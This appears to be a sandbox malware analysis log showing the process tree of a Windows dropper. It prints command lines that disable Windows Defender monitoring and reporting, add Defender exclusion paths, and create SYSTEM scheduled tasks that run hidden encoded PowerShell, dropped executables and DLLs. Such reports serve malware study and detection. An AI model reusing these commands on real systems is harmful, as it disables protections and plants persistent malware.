                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /CREATE /TN "gjkQBGasR" /SC once /ST 09:37:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                - Creates scheduled task(s)

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /run /I /tn "gjkQBGasR"

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /DELETE /F /TN "gjkQBGasR"

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /CREATE /TN "bCfEGNwGDQwhWneLvC" /SC once /ST 23:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exe\" pb /site_id 525403 /S" /V1 /F
                - Drops file in Windows directory
                - Creates scheduled task(s)

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {35D18047-4472-4FF2-A93E-EB29208C98AA} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force

[1] C:\Windows\system32\gpscript.exe
    Command line: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {F5C39959-689E-4B0C-AF30-9C54EB0D2572} S-1-5-18:NT AUTHORITY\System:Service:

    [2] C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\TWjAkEt.exe pb /site_id 525403 /S
        - Executes dropped EXE
        - Drops file in System32 directory

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "gAwAVXBKV" /SC once /ST 19:24:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /run /I /tn "gAwAVXBKV"

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /DELETE /F /TN "gAwAVXBKV"

        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

            [4] C:\Windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                - Modifies Windows Defender Real-time Protection settings

        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

            [4] C:\Windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                - Modifies Windows Defender Real-time Protection settings

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "gISRYSwkV" /SC once /ST 18:26:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /run /I /tn "gISRYSwkV"

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /DELETE /F /TN "gISRYSwkV"
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jUlWXsHGbnJNPdLP\klMksWmF\jRunghrZMgqLhFQn.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jUlWXsHGbnJNPdLP\klMksWmF\jRunghrZMgqLhFQn.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BekoRFZthbLHeaVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jUlWXsHGbnJNPdLP" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbOXiPgms" /SC once /ST 10:20:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbOXiPgms"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbOXiPgms"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cfFFKgQyvKFYWQGgS" /SC once /ST 19:58:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exe\" lH /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cfFFKgQyvKFYWQGgS"3⤵
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exeC:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\twWLSVy.exe lH /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCfEGNwGDQwhWneLvC"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RIuAFuLLU\bzKuSC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qcUOvNLqmSmqpxF" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qcUOvNLqmSmqpxF2" /F /xml "C:\Program Files (x86)\RIuAFuLLU\zvTOjjj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qcUOvNLqmSmqpxF"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qcUOvNLqmSmqpxF"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nCtegvDAmjdVDw" /F /xml "C:\Program Files (x86)\QqSrWmvdGtwU2\jjOOKBz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VircTphmeRxIj2" /F /xml "C:\ProgramData\BekoRFZthbLHeaVB\yQxwrPX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BPTpyhbDHEioZHGkr2" /F /xml "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\mKvNqep.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aTjIGRcnJusWUoAznGe2" /F /xml "C:\Program Files (x86)\FpvksngNCKIjC\uctwdBY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vdoHbRZAyoFFuVbVu" /SC once /ST 19:58:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vdoHbRZAyoFFuVbVu"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cfFFKgQyvKFYWQGgS"3⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll",#1 /site_id 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\BGqJMPII\SSVtENh.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vdoHbRZAyoFFuVbVu"4⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-772318503-20201097832123649311-176107108320859442231582663093-16614955271040602820"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-17112276981107577348-174050087717324368371999302583-616379219-1445376830653351254"1⤵
- Windows security bypass
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Downloads